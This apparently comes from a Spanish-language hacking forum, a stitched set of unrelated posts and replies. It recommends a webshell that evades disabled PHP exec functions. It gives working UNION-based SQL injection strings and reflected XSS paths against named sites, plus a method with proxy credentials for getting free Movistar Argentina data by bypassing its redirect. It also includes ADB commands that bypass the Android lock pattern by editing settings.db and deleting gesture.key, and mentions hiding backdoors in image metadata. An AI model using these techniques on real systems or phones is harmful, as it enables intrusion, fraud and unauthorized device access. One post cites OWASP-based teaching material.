Muchas veces cuado ingresamos a un server y subimos nuestra webshell, nos encontramos con que la mayoria de las funciones que interactuan con el systema en php (ejecucion de comandos), estan deshabilitadas por seguridad, ya que se trata de un vps, en el cual conviven varios host.




La mayoria de estas webshell utiliza funciones como popen(), exec(), shell_exec(), system(), en el screenshoot se puede ver como ciertas de ellas se encuntran down, a todo esto me pregunto y ssh2_exec() y pcntl_exec() estaban restringidas???...no!, antes que ponerme a programar algun script, o a modificar la shell, me puse a preguntar por alguna que utilizara estas funciones, entonces me cruzo con la shell 12309, que justamente cumplia con lo requerido.



Aca les dejo el link de descarga.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

PD: si la llaman normalmente los va a redireccionar a la pagina de error 404, miren el cdigo en las primeras lineas 

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola emm el problema de la impresion pasa por que la configuración en el mysql  SET [GLOBAL | SESSION] group_concat_max_len = val;  te dice el máximo a imprimir, también depende si el select tiene en algún lado order by,  por defecto es 1024 caracteres creo(pero investigalo en google)... y si tiene order es de 512 asi que si usas la clausula limit para fijar el numero de filas devueltas por select podrias solucionar tu problema.. asi que seria algo asi...

title.php?type=2&id=-1+union+all+select+1,2,3,4,concat(table_name,0x3C62723E),6,7,8,9,10,11,12,13+from+information_schema.tables+limit+20,1+--+

asi que vas sumando en tu caso 21,1  22,1 etc etc etc hasta que llegues a la tabla que deseas ... espero te sirva y si alguien tiene alguna correccion de lo dicho es bienvenida
saludos

D4NB4R

Le agregaria una linea para optimizar un poco mas la inyeccion y que pueda buscar tablas solo en la db, amigo primero enumera las dbs en el server:

1+union+all+select+1,2,3,4,database(),6,7,8,9,10,11,12,13+limit+*,1--

usando la funcion limit como el te explico

desp expongo el vector anterior pero ademas le agregas un where table_chema=db (base de datos donde quieres buscar mas que nada para que no te comas las tablas de la db information_schema)

-1+union+all+select+1,2,3,4,concat(table_name,0x3C62723E),6,7,8,9,10,11,12,13+from+information_schema.tables+where+table_schema=db+limit+20,1

Saludos!

El siguiente material hace parte del contenido tematico que imparto en la electiva Hacking de Web  y en el Programa de Especializacion en Seguridad Informatica (Seminario en Seguridad Web) en la Universidad Autonoma de Occidente, es solo una recopilacion adaptada del Informe del proyecto OWASP TOP 10-2010 desmenuzando su contenido a mi manera como me gusta a mi con plastilina tomando lo q considero mas importante y complementandolo con evidencias de casos reales de Auditoria de Seguridad Web.



No vamos a ver cosa de otro mundo solo algunas evidencias q clasifique entre lo q consideraba los riesgos mas importantes en Aplicaciones Web.





He aqui la presentacion que espero sea de su agrado.......

Presentacion: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Y he decidido compartir el dia de Hoy como contribucion al libre conocimiento. No estoy como muy conversador Hoy mas bien como con depre............ xD



Asi que si te gusto solo ...............







Bytes



Dino

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

gracias por compartir man, a mas de uno le va a servir!

si, es un sqli de doble consulta basada en error, pero no esta en ese path.

Path vulnerable=No tienes permitido ver los links. Registrarse o Entrar a mi cuenta[XSS]


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

• /%29%3C/script%3E&UI_LOCALE=&pnr=&motivo=&nocont=1

buen post, Nunca hay que fiarse tampoco de las herramientas de fingerprintimg online, que por lo general buscan las version del blog en los tag <meta>, el admin podria modificarlos, para no dejar ver la version correcta, dejo una tool online para la busquedad de version de este tipo de CMS, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

yo suelo utilizar weevely que es muy similar a esta tool, incluso se podria inyectar el backdoor en los metadatos de una imagen.

En ese caso, podes utilizar addons de firefox como:

Tamper Data: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Live HTTP Headers: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Add N Edit Cookies: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

La complicacion de todo esto es que el cel, por empezar tiene que estar rooteado, si no lo esta de nada sirve intentarlo, a no ser que tengas la suerte de que ademas tenga la depuracion usb activa, hay si podes elevar privilegios e intentar desbloquerar el patron.

Hola como estan todos!? este es un nuevo pdf en el que pretendo desarrollar de manera sencilla y entendible dos tecnicas de inyeccion a ciegas en base de datos Mysql, por un lado me gustaria comenzar a hacer un corto repaso de la tecnica "binary search" que es comunmente las mas usada y conocida para realizar este tipo de ataques, despues pasar a lo que es el metodo "Bit Shifting" y por ultimo culminar con otro metodo que hace uso de la funcion FIND_IN_SET().


Disfruten el documento

Visualizalo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descarga directa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Por suspuesto man, el problema esta en al unico host que me deja conectarme libremente es al proxy, podria hacer un tunel ssh entre el cel y mi pc en local pero no encuentro navegador para android que soporte socks, en cuanto a las conexiones tcp por protocolos como ssh, ftp, smtp, etc el apn me las denega.

Se te olvido decir que para utlizar el wrapper No tienes permitido ver los links. Registrarse o Entrar a mi cuenta las directivas allow_url_include y allow_url_fopen tienen que estar ON, por consiguiente dicho LFI se convertiria en un RFI, y seria al pedo ejecutar comando de esa manera puediendo incluir directamente una shell a travez de la url.

Buen post igual!   

No todos los errores del tipo mysql, mssql, postgresql, sqlite3, funciones como include(), main(), require(), require_once() , errores en scripts VBscripts, etc, tienen que ser suceptibles a rfi, lfi, sqli, etc. Hay ciertas ocaciones en que este tipo de mensajes no pueden ser aprovechados de manera satisfactoria, pero a travez del error se podria inyectar codigo javascript en el index. Miremos un ejemplo de una web que al parecer es vulnerable a mysql injection.






Como podemos divisar en el mensaje que nos devuelve la DB salta la cadena que acabo de inyectar en el parametro vulnerable.

Probemos a ver si logramos ponerla en <b>negrita</b>



Efectivamente inyectamos codigo html, a ver que pasa con un alert?.



bien, vemos en que otro tipo de error podemos incrustar un XSS.


En la siguiente web tenemos una posible lfi.




Probemos nuevamente de meter un alert donde se alla la cadena que nos devuelve el error.




Como vemos todo error por parte del servidor que nos devuelva la cadena que introducimos en el parametro puede ser aprovechado para inyectar de manera reflejada un XSS, con o sin evasivas! ojala les haya servido!

Bytes!

Bue!, parece que los de movistar se pusieron de acuerdo X)...

Sitio= No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Path vulnerable= productSearch.aspx?txt=[XSS]

Hace bastante tiempo que habia encontrado esta especie de falla, si se puede llamar asi, pero hasta ahora no se me habia ocurrido escribir sobre ella, queria esperar un poco mas para cersiorarme de que en realidad no se trataba de un problemita temporal en el servicio de movistar argentina.
La verdad que me lleve la sorpresa sin querer, jugando con el navegador, sin un mango en el android, me puse a realizar peticiones forzadas, abriendo varias pestañas a la vez tratando de conectar a un mismo dominio, y puff? que paso logre obtener el index del objetivo, aunque algunos objectos de la pagina no habian logrado cargar completamente, como imagenes o *.swf, estaba viendo el contenido de una pagina si garpar un centavo de mi bolsillo.



Lo primero que pense fue, quizas este cacheada en el proxy? ya que me conectaba a travez de este. Pero con el tiempo me fui dando cuenta que el contenido en los foros cambiaba, y yo hacia una semana que estaba sin cred.
Bien, entonces puse a laburar a tcpdump y empeze a abrir pestañas a lo loco hasta que el objetivo me revelara el index.

El mayor error es el siguiente, permitir la entrada y salidad de datos para los clientes que no tiene saldo!




Obviamente si intento conectarme a cualquier dns fuera de los que es No tienes permitido ver los links. Registrarse o Entrar a mi cuenta el apn me redirecciona hacia la web de telefonica.




"PARA SEGUIR NAVEGANDO NECESITAS RECARGAR TU CREDITO!"

Puedo navegar tranquilamente sobre los host del servidor.

Una vez capturado todo el trafico necesario para ver que pasaba, lo visualizo con whireshark, en la imagen se puede ver el GET a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y un 307 (redireccion) por parte del apn.



Entonces que mierda pasaba?? como podia saltear el redireccionamiento? me carcomia la duda, entonces fui directo a la magia, busque la respuesta 200 ok que me tiraba el apn una vez que lograba cargar el contenido prohibido jojo.



Obteniendo el contenido de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Llegue a la conclucion que el index se cacheaba en el proxy una vez que este lo pedia, asi mismo me devolvia los datos que habia logrado cargar.
Pero por que?, no tengo idea, supongo que el apn esta configurado con un limite de redirecciones ante determinada cantidad de peticciones, viendo de cerca el trafico capturado por tcpdump, diviso una respuesta http del tipo 304, (Not Modified).

CitarEl HTTP Error 304 (Not modified), es un código de estado HTTP  para "use a local  copy" (usar copia local), que significa que la página será recibida desde el caché del visitante en lugar de ser recibida desde el servidor web.

Técnicamente el "error 304" no está indicando un error, sino que indica que el recurso que es requerido no ha cambiado desde la última vez que ha accedido.

El código 304 sólo debe ser retornado desde el servidor web si es permitido por el cliente (por ejemplo, el navegador web). Dicho cliente especifica esto último a través de, por ejemplo, la cabecera If_Modified_Since en la petición.

También el código 304 es empleado por los sistemas que crean caché o las arañas (spiders) de los buscadores, para determinar si un recurso debe ser o no descargado nuevamente.

Segun la deficion del el mensaje tipo 304, me dice que el contenido no ha cambiado desde la ultima vez que se ha accedido, pero al lograr cargar el contenido este se encuentra actualizado.
Ademas de recivir la informacion que el proxy a cacheado, en fin, veamos que pasa con ICMP y UDP, son filtrados??

Con un simple ping...








Llamada perdida LOL!

Evidentemente no filtra por ambos protocolos.

Dejo los datos del APN.

Nombre: Movistar_WAP

APN:wap.gprs.unifon.com.ar

Proxy: 200.5.68.10

Puerto: 8080

User: wap

Password: wap


Bueno se los dejo como una incognita, el que posea servicio en movistar argentina y tenga tiempo para probar que no dude en hacerlo ah dejo el trafico capturado por tcpdump por si quieren analizarlo con mas detalle.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Saludos!

Esta genial, por esa razon tengo desactivada la opcion de incluir hubicacion en el android, ademas de tener el gps desactivado, y activarlo solamente cuando se requiera, buen post!.

Muchos de nosotros bloqueamos nuestro teléfono con el característico sistema de patrón de seguridad de Android. Siempre se ha caracterizado como un buen método para proteger tu teléfono de las miradas indiscretas y que aporta una buena seguridad en general. Pero como siempre he dicho, si alguien quiere entrar en tu teléfono, lo hará. Con patrón o sin.

En esta ocasión un usuario de XDA (m.sabra) acaba de descubrir un método muy sencillo que nos va a permitir saltarnos el patrón de seguridad de cualquier teléfono Android sin necesidad de ser root. Tan solo hace falta dos cosas


  Saber utilizar el ADB (¿he oído drivers bien instalados?)
  Tener el modo depuración activado



Los métodos para saltarse el patrón de desbloqueo son los siguientes

Método 1

En una consola mediante ADB introducimos las siguientes órdenes

   

 adb shell
    cd /data/data/com.android.providers.settings/databases
    sqlite3 settings.db
    update system set value=0 where name='lock_pattern_autolock';
    update system set value=0 where name='lockscreen.lockedoutpermanently';
    .quit

Método 2

Mucho más sencillo. En esta ocasión tan solo hemos de ejecutar lo siguiente

adb shell rm /data/system/gesture.key

m.sabra nos recomienda realizar la siguiente rutina

   
    Método 1
    Reiniciar
    Método 2
    Reiniciar



Al hacer todo esto, puede que te siga pediendo el patrón de desbloqueo pero tal y como se muestra en el vídeo,  puedes pulsar cualquier cosa.
Conclusiones

De este hecho se han de sacar varias conclusiones

Por mucho patrón de seguridad, código pin o lo que sea, si alguien que sabe de móviles te roba el teléfono podrá saltárselo todo. No hay un sistema de protección definitivo
Más vale tener desactivado el modo depuración cuando no lo necesites. Si no lo tienes activado este método no sirve.
Este método puede ser una buena solución para toda la gente que pone un patrón de seguridad y luego se olvida de él.

Espero que os haya parecido interesante. Yo desde luego me lo apunto para el futuro.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Le falta darle por SSI y LDAP ah! te hace un cafe tambien? XD buena tool!